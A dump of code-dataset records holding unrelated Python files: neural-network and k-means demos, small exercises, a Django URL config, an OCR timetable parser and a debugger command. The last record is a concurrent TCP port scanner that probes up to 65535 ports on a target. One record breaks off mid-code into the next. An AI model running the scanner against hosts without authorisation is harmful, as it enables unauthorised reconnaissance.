np.dot(self.learning_rate,np.dot(self.threshold_hide,error_hide))\n\n self.weight_out = self.weight_out + delta_weight_out\n #self.threshold_out = self.threshold_out + delta_threashold_out\n \n \n self.weight_hide = self.weight_hide + delta_weight_hide\n #self.threshold_hide=self.threshold_hide + delta_threashold_hide\n \n def evaulation(self):\n accuracy = np.argmax(self.outputlayer,1) == np.argmax(self.labels,1)\n accuracy = str(int(np.count_nonzero(accuracy)/10*100))+\"%\"\n return (np.sum(np.power((self.labels - self.outputlayer),2))),accuracy\n \n \n def test_result(self,testData):\n\n midlayer = self.sigmod(np.dot(testData,self.weight_hide) - self.threshold_hide)\n # print (\"midlayer\",self.midlayer.shape)\n result = self.sigmod(np.dot(midlayer,self.weight_out )- self.threshold_out) \n return (result)\n # print (\"outputlayer\",self.outputlayer.shape)\n \n def main(self,testData=''):\n results = []\n for i in range (self.iteration):\n self.feedforward()\n self.weight()\n result = self.evaulation()\n #if result[1] == \"100%\":\n # break\n results.append(result)\n\n \n sum_square_error,accuracy = zip(*results)\n\n plt.plot(sum_square_error)\n plt.xlabel(\"Epochs\")\n plt.ylabel(\"Sum Square Error\")\n plt.show()\n \n testint_result = self.test_result(testData)\n print (np.argmax(testint_result))\n \nclass data_set():\n \n \n def data(self):\n d1=[3,7,8,11,13,18,23,28,33,38,43]\n d2=[2,3,4,6,10,15,20,24,28,32,36,41,42,43,44,45]\n d3=[2,3,4,6,10,15,20,24,30,35,36,40,42,43,44]\n d4=[4,8,9,13,14,18,19,22,24,26,29,31,32,33,34,35,39,44]\n d5=[1,2,3,4,5,6,11,16,17,18,19,21,25,30,35,36,40,42,43,44]\n d6=[2,3,4,6,10,11,16,21,22,23,24,26,30,31,35,36,40,42,43,44]\n d7=[1,2,3,4,5,10,14,19,23,28,33,38,43]\n d8=[2,3,4,6,10,11,15,16,20,22,23,24,26,30,31,36,36,40,42,43,44]\n d9=[2,3,4,6,10,11,15,16,20,22,23,24,25,30,35,36,40,42,43,44]\n d0=[2,3,4,6,10,11,16,21,26,31,36,42,43,44,15,20,25,30,35,40]\n \n data_list=[d0,d1,d2,d3,d4,d5,d6,d7,d8,d9]\n d_shape = np.zeros(45)\n data_set=[]\n for j in data_list:\n \n d_shape = np.zeros(45)\n \n for i in j:\n \n d_shape[i-1] = 1\n # d_shape = d_shape.reshape((-1,1))\n data_set.append(d_shape)\n data_set = np.asanyarray(data_set) \n #data_set = data_set.T\n label_set = np.zeros([10,10])\n \n \n for i in range(10):\n label_set[i][i]=1\n # label = np.zeros(10)\n # label[i]=1\n # label = label.reshape(-1,1)\n # label_set.append(label)\n \n #label_set = np.asanyarray(label_set)\n return data_set,label_set\n \n\n\n\nget_data = data_set()\ntraining_data,label_data = get_data.data()\n\ninput_value = [3,7,8,11,13,18,23,28,33,38,43]\ninput_test = np.zeros(45)\nfor i in input_value:\n input_test[i-1] = 1\n\noutput_test = [0,1,0,0,0,0,0,0,0,0]\n#input_test = input_test.reshape(-1,1)\noutput_test = np.asanyarray(output_test)#.reshape(-1,1)\ntrainings = training(training_data,label_data,5,10,0.5,10000)\ntrainings.main(input_test)","sub_path":"p3.py","file_name":"p3.py","file_ext":"py","file_size_in_byte":6006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"383855114","text":"import random\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom math import *\nfrom decimal import Decimal\n\ndef euclidean_distance(x1, x2):\n return np.sqrt(np.sum((x1 - x2) ** 2))\n\ndef minkowski_distance(x1, x2, r): \n return sum([abs(x-y)**r for x,y in zip(x1,x2)])**1/r\n\ndef pearson_correlation(x1, x2):\n mean_x = sum(x1)/len(x1)\n mean_y = sum(x2)/len(x2)\n subtracted_mean_x = [i - mean_x for i in x1]\n subtracted_mean_y = [i - mean_y for i in x2]\n x_times_y = [a * b for a, b in list(zip(subtracted_mean_x, subtracted_mean_y))]\n x_squared = [i * i for i in x1]\n y_squared = [i * i for i in x2]\n return sum(x_times_y) / sqrt(sum(x_squared) * sum(y_squared))\n\ndef plot_points(data_points):\n x, y = data_points.T\n plt.scatter(x, y)\n plt.show\n\ndef create_centers(k):\n centers = []\n for i in range(k):\n centers.append([random.randint(0, 100), random.randint(0, 100)])\n return np.array(centers)\n\ndef compute_new_centers(cluster, centers):\n return np.array(cluster + centers)/2\n\ndef assign_cluster(distance, data_point, centers):\n index_min = min(distance, key = distance.get)\n return [index_min, data_point, centers[index_min]]\n\ndef k_means(data_points, centers, p_measure):\n label = []\n cluster = []\n total_points = len(data_points)\n k = len(centers)\n if(p_measure == 'm'):\n r = int(input(\"Enter value of r: \"))\n for epoch in range(0, 200):\n for index_point in range(0, total_points):\n distance = {}\n for center_index in range(0, k):\n if(p_measure == 'e'):\n distance[center_index] = euclidean_distance(\n data_points[index_point], centers[center_index])\n elif(p_measure == 'm'):\n distance[center_index] = minkowski_distance(\n data_points[index_point], centers[center_index], r)\n elif(p_measure == 'p'):\n distance[center_index] = pearson_correlation(\n data_points[index_point], centers[center_index])\n elif(p_measure == 's'):\n distance[center_index] = spearman_correlation(\n data_points[index_point], centers[center_index])\n label = assign_cluster(distance, data_points[index_point], centers)\n centers[label[0]] = compute_new_centers(\n label[1], centers[label[0]])\n if epoch == (200 - 1):\n cluster.append(label)\n return [cluster, centers]\n\ndef print_cluster_data(result):\n print(\"Result of k-Means Clustering: \\n\")\n for data in result[0]:\n print(\"data point: {}\".format(data[1]))\n print(\"cluster number: {} \\n\".format(data[0]))\n print(\"Last centroids position: \\n {}\".format(result[1]))\n\n\ndef rearrange_clusters(k, result):\n clusters = []\n for cluster in range(k):\n cluster_points = []\n for data in result[0]:\n if data[0] == cluster :\n cluster_points.append(np.array(data[1]))\n clusters.append(np.array(cluster_points))\n return clusters\n\n\n\nif __name__ == \"__main__\":\n data_points = np.genfromtxt(\"assets/data.csv\", delimiter=\",\")\n #plot_points(data_points)\n p_choice = 0\n print(\"PROXIMITY MEASURES:\\n\\n1. Euclidean Distance\\n2. Minkowski Distance\\n3. Pearson Correlation \\n4. Spearman Correlation\")\n while p_choice not in [1, 2, 3]:\n p_choice = int(input(\"Choose proximity measure to be used: \"))\n if(p_choice == 1):\n p_measure = 'e'\n elif(p_choice == 2):\n p_measure = 'm'\n elif(p_choice == 3):\n p_measure = 'p'\n elif(p_choice == 4):\n p_measure = 's'\n k = int(input(\"No. of clusters: \"))\n centers = create_centers(k)\n [cluster, new_centers] = k_means(data_points, centers, p_measure)\n clusters = rearrange_clusters(k, [cluster, new_centers])\n #print(clusters)\n for cluster in clusters:\n plot_points(cluster)","sub_path":"k-means.py","file_name":"k-means.py","file_ext":"py","file_size_in_byte":3986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"557707616","text":"def get_3_lagest(l):\n\t\"\"\"Find 3 the largest items from a list\"\"\"\n\t# Only change code below this line\n\tif len(l)<3: return l\n\telse:\n\t l.sort() #(reverse=True)\n\t lm = l[-3:len(l)]\n\treturn lm\n\t# Only change code above this line\n\n\nok = True\n \ndef test(x, y, msg):\n\tif x != y:\n\t\tprint(\"Test failed:\", msg)\n\t\tprint(\"Actual result: \", x)\n\t\tprint(\"Expected result: \", y)\n\t\tprint(\"\")\n\t\tglobal ok\n\t\tok = False\n \ntest(get_3_lagest([]), [], \"Empty list\")\ntest(get_3_lagest([1, 2]), [1, 2], \"Only 2 items\")\ntest(get_3_lagest([3, 2, 1, 5, -1, 7, 3, 8]), [5, 7, 8], \"More than 3 items\")\n\nif ok:\n\tprint(\"All tests passed\")\n","sub_path":"testMA_04.py","file_name":"testMA_04.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"329362853","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# -----------------------------------------------------------------------------\n# Copyright (c) 2014, Vispy Development Team.\n# Author: Jérôme KIEFFER\n# Distributed under the (new) BSD License. See LICENSE.txt for more info.\n# -----------------------------------------------------------------------------\n\n\"\"\"\nDemo showing the sharing of a OpenGL texture <--> OpenCL image\n\"\"\"\n\nimport os\nimport sys\nimport time\nimport numpy\nfrom vispy import app\nfrom vispy import gloo\nfrom vispy import opencl\nimport pyopencl.array\nN = 2048\n\n\nsrc = \"\"\"\n__kernel void buf_to_tex( global const float *ary,\n int width,\n int height,\n global const float *mini,\n global const float *maxi,\n const int logscale,\n write_only image2d_t texture)\n{\n int x = get_global_id(0);\n int y = get_global_id(1);\n if ((x>=width)||(y>=height)) return;\n float data;\n if (maxi[0]==mini[0])\n data = (ary[x+width*y] - mini[0]);\n else\n data = (ary[x+width*y] - mini[0])/(maxi[0]-mini[0]);\n if (logscale)\n data = log(data*(M_E_F-1.0f)+1.0f);\n write_imagef( texture, (int2)(x,y), data);\n}\n__kernel void\nu16_to_float(global unsigned short *array_int,\n global float *array_float,\n const int IMAGE_W,\n const int IMAGE_H\n )\n{\n //Global memory guard for padding\n if ((get_global_id(0) : => \n while : => \n return => \n = => \n\nThe above is done via regular expression matching. No fancy parsing is\ndone, say, to look to see if *expr* is split across a line or whether\nvar an assignment might have multiple variables on the left-hand side.\n\n**Examples:**\n\n eval 1+2 # 3\n eval # Run current source-code line\n eval? # but strips off leading 'if', 'while', ..\n # from command\n\nSee also `set autoeval`, `pr`, `pp` and `examine`.\n\"\"\"\n __module__ = __name__\n aliases = ('eval?', '?')\n category = 'data'\n min_args = 0\n max_args = None\n name = os.path.basename(__file__).split('.')[0]\n need_stack = True\n short_help = 'Print value of expression EXP'\n\n def run(self, args):\n if 1 == len(args):\n text = self.proc.current_source_text.rstrip('\\n')\n if '?' == args[0][(-1)]:\n text = Meval.extract_expression(text)\n self.msg('eval: %s' % text)\n else:\n text = self.proc.current_command[len(self.proc.cmd_name):]\n text = text.strip()\n try:\n self.proc.exec_line(text)\n except:\n pass\n\n\nif __name__ == '__main__':\n import inspect\n cmdproc = import_relative('cmdproc', '..')\n debugger = import_relative('debugger', '...')\n d = debugger.Debugger()\n cp = d.core.processor\n cp.curframe = inspect.currentframe()\n command = EvalCommand(cp)\n me = 10","sub_path":"pycfiles/pydbgr-0.2.6-py2.4/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"534231196","text":"import tkitText\nimport tkitDb\nimport os\nimport gc\n# tt=tkitText.Text()\n# tt=tkitText.Text()\n# tt.load_ht(ht_model=\"tkitfiles/ht.model\")\n\n# tt.load_ht()\n# tt.typed_words(ht_model=\"tkitfiles/ht_rel.model\")\n# para=\"\"\"\n# 根据统计,边境牧羊犬的寿1命大概在13-14年左右,它的体型中等,身躯筋肉健壮\n# \"\"\"\n\n# print(tt.ht.cut_sentences(para))\n\n\n# for word, flag in tt.ht.posseg(para):\n# \tprint(\"%s:%s\" % (word, flag),end = \" \")\n# # tt.ht.add_new_entity(\"寿命\", mention0=\"寿1命\", type0=\"关系词\") # 作为特定类型登录\n\n\n# for word, flag in tt.ht.posseg(para):\n# \tprint(\"%s:%s\" % (word, flag),end = \" \")\n\n\n\n# para = \"上港的武磊和恒大的郜林,谁是中国最好的前锋?那当然是武磊武球王了,他是射手榜第一,原来是弱点的单刀也有了进步\"\n\n# entity_mention_dict = {'武磊':['武磊','武球王'],'郜林':['郜林','郜飞机'],'前锋':['前锋'],'上海上港':['上港'],'广州恒大':['恒大'],'单刀球':['单刀'],'寿命':[\"寿命\",'寿1命']}\n# entity_type_dict = {'武磊':'球员','郜林':'球员','前锋':'位置','上海上港':'球队','广州恒大':'球队','单刀球':'术语','寿命':'关系词'}\n# entity_dict=entity_mention_dict,entity_type_dict\n# pkl=tkitDb.Pkl(path=\"tkitfiles\",task='entity_dict')\n# pkl.save([entity_dict])\n\n# def load_entity_dict():\n# \"\"\"\n# 加载词典\n# \"\"\"\n# pkl=tkitDb.Pkl(path=\"tkitfiles\",task='entity_dict')\n# entity_dict_list = []\n# for item in pkl.load():\n# entity_dict_list=entity_dict_list+item\n# return entity_dict_list[0]\n\n\n\n\n\n# #保存术语词\n# tt.ht.save_entity_info(save_path='./ht_entities.txt',)\n# # 加载术语\n# tt.ht.load_entities( load_path='./ht_entities.txt', override=True)\n# #添加术语\n# entity_mention_dict = {'武磊':['武磊','武球王'],'郜林':['郜林','郜飞机'],'前锋':['前锋'],'上海上港':['上港'],'广州恒大':['恒大'],'单刀球':['单刀'],'寿命':[\"寿命\",'寿1命']}\n# entity_type_dict = {'武磊':'球员','郜林':'球员','前锋':'位置','上海上港':'球队','广州恒大':'球队','单刀球':'术语','寿命':'关系词'}\n# tt.ht.add_entities(entity_mention_dict,entity_type_dict)\n\n\n\n\n\n# print(tt.ht.entity_type_dict)\n# print(tt.ht.entity_mention_dict)\n# print(tt.ht.entity_type_dict)\n\n\n\nclass TEntityRel:\n \"\"\"\n 关系词和实体操作类\n \"\"\"\n\n def __init__(self,model=None):\n self.tt=tkitText.Text()\n if model ==None:\n self.model=\"tkitfiles/ht.model\"\n else:\n self.model=model\n if os.path.exists(self.model):\n self.tt.load_ht(ht_model=self.model)\n else:\n self.tt.load_ht()\n self.tt.typed_words(ht_model=self.model)\n self.tt.save_ht()\n def __del__(self):\n print(\"__del__\")\n class_name = self.__class__.__name__\n print(class_name, '销毁')\n\n # try:\n # self.tt.load_ht(ht_model=self.model)\n # except:\n # self.tt.load_ht()\n # self.tt.typed_words(ht_model=self.model)\n def save(self):\n self.tt.save_ht()\n def release(self):\n del self.tt\n gc.collect()\n pass\n\n def add_entities(self,entity_mention_dict,entity_type_dict):\n \"\"\"\n #添加术语\n entity_mention_dict = {'武磊':['武磊','武球王'],'郜林':['郜林','郜飞机'],'前锋':['前锋'],'上海上港':['上港'],'广州恒大':['恒大'],'单刀球':['单刀'],'寿命':[\"寿命\",'寿1命']}\n entity_type_dict = {'武磊':'球员','郜林':'球员','前锋':'位置','上海上港':'球队','广州恒大':'球队','单刀球':'术语','寿命':'关系词'}\n \"\"\"\n self.tt.ht.add_entities(entity_mention_dict,entity_type_dict)\n self.save()\n def add_entities_one(self,word,mention0,type0=\"实体\"):\n \"\"\"\n 添加一个同义词或者关系词\n word, 所属的同义词 作为roo\n mention0, t关键词\n type0 类型\n\n\n \n \"\"\"\n self.tt.ht.add_new_entity(word, mention0=mention0, type0=type0) # 作为特定类型登录\n self.save()\n def get_entity_rel(self,para):\n \"\"\"基于词典获取实体和关系词\n 并无对应关系\n 返回\n entity_words,rel\n 实体和关系列表\n \"\"\"\n\n rel=[]\n entity_words=[]\n for word, flag in self.tt.ht.posseg(para):\n # print(\"%s:%s\" % (word, flag),end = \" \")\n if flag==\"关系\":\n rel.append(word)\n elif flag==\"实体\":\n entity_words.append(word)\n # print(rel)\n # print(entity_words)\n return entity_words,rel\n def entity_linking(self,para):\n #进行消歧义实体链接\n for span, entity in self.tt.ht.entity_linking(para):\n print(span, entity)\n\n# terry_er=TEntityRel()\n\n# para=\"\"\"\n# 何引丽是中国内蒙古自治区包头市人,中华人民共和国田径运动员\n# \"\"\"\n\n# # #添加实体词和冠词\n# # terry_er.add_entities_one(\"寿命\",'寿1命','关系')\n# # terry_er.add_entities_one(\"边境牧羊犬\",'边境牧羊犬','实体')\n# # terry_er.entity_mention_dict,entity_type_dict)\n# entity_words,rel=terry_er.get_entity_rel(para)\n# print(rel)\n# print(entity_words)\n\n","sub_path":"关系判断/TEntityRel.py","file_name":"TEntityRel.py","file_ext":"py","file_size_in_byte":5319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"167231738","text":"\"\"\"main URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf import settings\n\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom accounts.views import log_in, log_out, SignUpView\nfrom rest_framework_simplejwt.views import (\n TokenObtainPairView,\n TokenRefreshView,\n)\n# from django.contrib.auth.views import LogoutView, PasswordResetView, LoginView, PasswordResetDoneView\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', include('core.urls')),\n path('', include('accounts.urls')),\n path('accounts/', include('django.contrib.auth.urls')),\n path('signup/', SignUpView.as_view(), name=\"signup\"),\n path('api-auth/', include('rest_framework.urls')),\n path('api/', include('api.urls')),\n path('cbv/', include('cbv.urls')),\n path('rest-auth/', include('rest_auth.urls')\n ), path('rest-auth/registration/', include('rest_auth.registration.urls')),\n path('api/token/', TokenObtainPairView.as_view(), name='token_obtain_pair'),\n path('api/token/refresh/', TokenRefreshView.as_view(), name='token_refresh')\n # path('login/', log_in, name=\"login\"),\n # path('login/', LoginView.as_view(template_name='accounts/login.html'), name=\"login\"),\n # path('logout/', LogoutView.as_view(), name=\"logout\"),\n # path('reset_password/', PasswordResetView.as_view(\n # template_name='accounts/rest_password.html'), name=\"reset_password\"),\n # path('reset_password/', PasswordResetDoneView.as_view(\n # template_name='accounts/rest_password_done.html'), name=\"password_reset_confirm\")\n] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","sub_path":"main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"329615363","text":"# coding:utf-8\n'''\n@Copyright:LintCode\n@Author: monolake\n@Problem: http://www.lintcode.com/problem/reorder-list\n@Language: Python\n@Datetime: 16-11-12 05:31\n'''\n\n\"\"\"\nDefinition of ListNode\nclass ListNode(object):\n\n def __init__(self, val, next=None):\n self.val = val\n self.next = next\n\"\"\"\nclass Solution:\n \"\"\"\n @param head: The first node of the linked list.\n @return: nothing\n \"\"\"\n def reverse(self, head):\n # write your code here\n current = None\n while head is not None:\n temp = head.next\n head.next = current\n current = head\n head = temp\n return current\n\n def middleNode(self, head):\n # Write your code here\n if head is None:\n return head\n \n fast = head\n slow = head\n \n while fast.next is not None and fast.next.next is not None:\n slow = slow.next\n fast = fast.next.next\n return slow\n \n def reorderList(self, head):\n # write your code here\n if head is None or head.next is None or head.next.next is None:\n return head\n \n midNode = self.middleNode(head)\n newNode = midNode.next\n midNode.next = None\n \n right = self.reverse(newNode)\n \n left = head\n \n dummy = ListNode(-1)\n t3 = dummy\n \n while right:\n t3.next = left\n left = left.next\n t3 = t3.next\n t3.next = right\n right = right.next\n t3 = t3.next\n \n t3.next = left\n \n return dummy.next\n \n \n \n \n","sub_path":"99_reorder-list/reorder-list.py","file_name":"reorder-list.py","file_ext":"py","file_size_in_byte":1697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"224285772","text":"def foo(num):\n\ti = 1\n\tflag = [False for x in range(10)]\n\twhile(1):\n\t\ttemp = num * i\n\t\twhile(temp != 0):\n\t\t\tflag[temp % 10] = True\n\t\t\ttemp /= 10\n\t\tif all(flag):\n\t\t\treturn num * i\n\t\telse:\n\t\t\ti+=1\n\t\tif(i > 50000):\n\t\t\tbreak\n\treturn -1\n\nwith open(\"A-large.in\") as readfile:\n\twith open (\"output.txt\", \"w\") as writefile:\n\t\tN = int(readfile.readline())\n\t\tfor x in range(N):\n\t\t\tnum = int(readfile.readline())\n\t\t\tif num == 0:\n\t\t\t\twritefile.write(\"Case #\" + str(x+1) + \": INSOMNIA\\n\")\t\n\t\t\telse:\n\t\t\t\tres = foo(num)\n\t\t\t\twritefile.write(\"Case #\" + str(x+1) + \": \" + str(res) + \"\\n\")","sub_path":"codes/CodeJamCrawler/16_0_1_neat/16_0_1_ThomasChen_Counting_Sheep.py","file_name":"16_0_1_ThomasChen_Counting_Sheep.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"432231914","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n'''\n\nExemplo sobre tratamento de exceções.\n\nExecute o script e:\n\n- No primeiro teste forneça 2 números inteiros. \n\n- No segundo teste forneça uma letra para um ou para os dois operandos\n\n'''\n\n\ndef sem_tratar(a, b):\n resultado = int(a) + int(b)\n\n print(\"Resultado da soma é: {}\".format(resultado))\n\n\ndef com_tratamento(a, b):\n try:\n\n resultado = int(a) + int(b)\n print(\"Resultado da soma é: {}\".format(resultado))\n\n except ValueError as e:\n print(\"Não foi possível fazer a soma. Veja o erro: {}\".format(e))\n\n\n\n\nif __name__ == '__main__':\n a = input(\"Entre com o primeiro operando: \")\n b = input(\"Entre com o segundo operando: \")\n\n com_tratamento(a, b)\n sem_tratar(a, b)","sub_path":"exemplo07/app-exemplo07.py","file_name":"app-exemplo07.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"25035341","text":"from google.cloud import vision\nimport io\nimport os\nfrom google.oauth2 import service_account\nimport re\nimport sys\n\ncourse = r\"^[A-Z]{4}[0-9]{4}$\"\ntime = r\"^[0-9]{1,2}:[0-9]{2}$\"\n\nclassContent = {}\n\ndate = []\ndateList = ['Monday','Tuesday','Wednesday','Thursday','Friday','Sat','Sun']\ndateScanned = []\n\ndiscarded = ['am','pm','Hour']\n\ntimeDict = {}\ntimeList = []\n\nscanFrom_y = 0\nscanFrom_x = 0\nscanEnd_x = 0\nscanEnd_y = 0\n\ntimeGap = 0\n\ndef printInfo(text):\n print('\\n\"{}\"'.format(text.description))\n vertices = (['({},{})'.format(vertex.x, vertex.y)\n for vertex in text.bounding_poly.vertices])\n print('bounds: {}'.format(','.join(vertices)))\n\ndef setUpTimeCol(text):\n # printInfo(text)\n padding = 5\n\n timeDict[text.description] = {}\n upper = text.bounding_poly.vertices[0].y if (text.bounding_poly.vertices[0].y > text.bounding_poly.vertices[1].y) else text.bounding_poly.vertices[1].y\n\n timeDict[text.description]['start'] = upper + padding\n timeList.append(text.description)\n\n if (len(timeList) == 2):\n global timeGap\n timeGap = timeDict[timeList[1]]['start'] - timeDict[timeList[0]]['start']\n\ndef convertDateToNum(text):\n if (text == \"Monday\"):\n return 0\n if (text == \"Tuesday\"):\n return 1\n if (text == \"Wednesday\"):\n return 2\n if (text == \"Thursday\"):\n return 3\n if (text == \"Friday\"):\n return 4\n if (text == \"Sat\"):\n return 5\n\ndef withinTable(poly):\n\n min_x = poly[0].x if (poly[0].x < poly[3].x) else poly[3].x\n max_x = poly[1].x if (poly[1].x > poly[2].x) else poly[2].x\n\n min_y = poly[0].y if (poly[0].y < poly[1].y) else poly[1].y\n max_y = poly[2].y if (poly[2].y > poly[3].y) else poly[3].y\n\n if (scanFrom_x < min_x and scanEnd_x > max_x and scanFrom_y < min_y and scanEnd_y > max_y):\n return True\n else:\n return False\n\ndef initDate():\n date.append({\"dateName\": \"Monday\", \"start_x\": 0, \"end_x\": 0, 'content': []})\n date.append({\"dateName\": \"Tuesday\", \"start_x\": 0, \"end_x\": 0, 'content': []})\n date.append({\"dateName\": \"Wednesday\", \"start_x\": 0, \"end_x\": 0, 'content': []})\n date.append({\"dateName\": \"Thursday\", \"start_x\": 0, \"end_x\": 0, 'content': []})\n date.append({\"dateName\": \"Friday\", \"start_x\": 0, \"end_x\": 0, 'content': []})\n\ndef setUpDateCol(text):\n # printInfo(text)\n\n if (text.description == 'Sat' or text.description == 'Sun'):\n\n if (text.description == 'Sat'):\n prevDate = convertDateToNum(text.description) - 1\n date[prevDate]['end_x'] = text.bounding_poly.vertices[0].x\n global scanEnd_x\n scanEnd_x = text.bounding_poly.vertices[0].x\n\n return\n\n # print(\"ENTER here\", text.description, text.bounding_poly.vertices[0].x)\n # find the start_x coordidate of thisDate\n thisDate = convertDateToNum(text.description)\n date[thisDate]['start_x'] = text.bounding_poly.vertices[0].x\n\n # this start_x of thisDate will be the end_x of prevDate\n if (thisDate > 0):\n prevDate = thisDate - 1\n date[prevDate]['end_x'] = text.bounding_poly.vertices[0].x\n\n dateScanned.append(text.description)\n\n tempScanFrom = text.bounding_poly.vertices[2].y if (text.bounding_poly.vertices[2].y > text.bounding_poly.vertices[3].y) else text.bounding_poly.vertices[3].y\n\n global scanFrom_y\n global scanFrom_x\n\n if (text.description == 'Monday'):\n scanFrom_x = text.bounding_poly.vertices[0].x - 5 # - 5 for padding\n\n if (scanFrom_y < tempScanFrom):\n scanFrom_y = tempScanFrom\n\ndef assignDate(text):\n\n for day in date:\n if (day['start_x'] < text.bounding_poly.vertices[0].x and day['end_x'] > text.bounding_poly.vertices[1].x):\n day['content'].append(text.description)\n\ndef detect_text(path):\n \"\"\"Detects text in the file.\"\"\"\n from google.cloud import vision\n client = vision.ImageAnnotatorClient()\n\n with io.open(path, 'rb') as image_file:\n content = image_file.read()\n\n image = vision.types.Image(content=content)\n\n response = client.text_detection(image=image)\n texts = response.text_annotations\n\n print('Texts:')\n\n # Set up time and date col, bound of the table to be scanned\n for text in texts:\n if (len(text.description) > 25):\n continue\n\n elif (re.match(time,text.description)):\n setUpTimeCol(text)\n\n elif text.description in dateList:\n setUpDateCol(text)\n\n global scanEnd_y\n scanEnd_y = timeDict[timeList[-1]]['start'] + timeGap\n\n # Ok, after we have the table bounds, only get the content within that bound\n for text in texts:\n if (len(text.description) > 25):\n continue\n\n if (withinTable(text.bounding_poly.vertices)):\n assignDate(text)\n\ndef printDateInfo():\n for day in date:\n print(day['dateName'],\": \")\n print(day['content'])\n\n\nif __name__ == '__main__':\n\n initDate()\n\n dir_path = os.path.dirname(os.path.realpath(__file__))\n\n # file_name = dir_path+\"/TestData\"+\"/ben.png\" # CHECKED dates, UNCHECKED time\n # file_name = dir_path+\"/TestData\"+\"/sean_1.png\" # CHECKED dates, UNCHECKED time\n # file_name = dir_path+\"/TestData\"+\"/sean_2.png\" # CHECKED dates, UNCHECKED time\n file_name = dir_path+\"/TestData\"+\"/sean_3.png\" # CHECKED dates, UNCHECKED time\n # file_name = dir_path+\"/TestData\"+\"/timetable-fullscreen.png\" # CHECKED dates, UNCHECKED time\n # file_name = dir_path+\"/TestData\"+\"/timetable-narrow-zoom.png\" # CHECKED dates, UNCHECKED time\n # file_name = dir_path+\"/TestData\"+\"/timetable-rotated.png\" # CHECKED dates, UNCHECKED time\n # file_name = dir_path+\"/TestData\"+\"/timetable-small.png\" # FAIL BOTH\n # file_name = dir_path+\"/TestData\"+\"/timetable-tall.png\" # CHECKED dates, UNCHECKED time\n # file_name = dir_path+\"/TestData\"+\"/timetable.png\" # FAIL BOTH\n # file_name = dir_path+\"/TestData\"+\"/timetable-wide.png\" # FAIL BOTH\n\n detect_text(file_name)\n\n # print()\n # print(\"scanFrom_x: \",scanFrom_x, \"scanFrom_y: \",scanFrom_y, 'scanEnd_x: ', scanEnd_x, 'scanEnd_y: ',scanEnd_y)\n print()\n printDateInfo()\n # print(timeDict)\n","sub_path":"OCR/Timetable/ocr.py","file_name":"ocr.py","file_ext":"py","file_size_in_byte":6157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"588350255","text":"import sys; input=sys.stdin.readline\nm, n = map(int, input().split())\narr = [[0]*m for _ in range(n)]; queue = []\nfor i in range(n):\n tmp = list(map(int, input().split()))\n for j in range(m):\n arr[i][j] = tmp[j]\n if tmp[j] == 1: queue.append((i, j))\nqueue = [queue]; count = 0\nwhile queue:\n Q = queue.pop(0)\n tmp = []\n count += 1\n for x, y in Q:\n for i, j in (-1, 0), (1, 0), (0, -1), (0, 1):\n xx = x+i; yy = y+j\n if 0<=xx --port_count=) [--timeout=]\n\nOptions:\n --target= target\n --port_count= port count default 65535\n --timeout= timeout for each tcp connection attempt\n\"\"\"\nimport socket\nfrom docopt import docopt\nimport concurrent.futures\n\n\ndef tcp_connect(target, port, timeout=1):\n \"\"\"\n Generate a list of URLs from a given subnet in CIDR notation\n\n Args:\n subnet: A subnet in CIDR notation ex. 192.168.1.0/24\n\n Returns:\n List of IPv4 addresses\n \"\"\"\n try:\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.settimeout(int(timeout))\n s.connect((target, port))\n print(\"connected: {}:{}\".format(target,port))\n return \"{}:{}\".format(target,port)\n except:\n print(\"failed: {}:{}\".format(target,port))\n pass\n\ndef tcp_connect_concurrent(target, port_count, timeout=1):\n \"\"\"\n Concurrently test tcp connections\n\n Args:\n target: target ipv4 address\n port_count: The number of ports to test starting at 1\n\n Returns:\n List of successful ports\n \"\"\"\n results_list = []\n port_count = int(port_count)\n if port_count < 0:\n port_count = 1000\n elif port_count > 65535:\n port_count = 65535\n with concurrent.futures.ProcessPoolExecutor(max_workers=50) as pool:\n results = {pool.submit(tcp_connect, target, port,timeout): port for port in range(port_count)}\n for future in concurrent.futures.as_completed(results):\n if future.result():\n results_list.append(future.result())\n return results_list\n\ndef main():\n opts = docopt(__doc__)\n if opts['--timeout']:\n res = tcp_connect_concurrent(opts['--target'], opts['--port_count'], opts['--timeout'])\n else:\n res = tcp_connect_concurrent(opts['--target'], opts['--port_count'])\n print(res)\n\nif __name__ == '__main__':\n 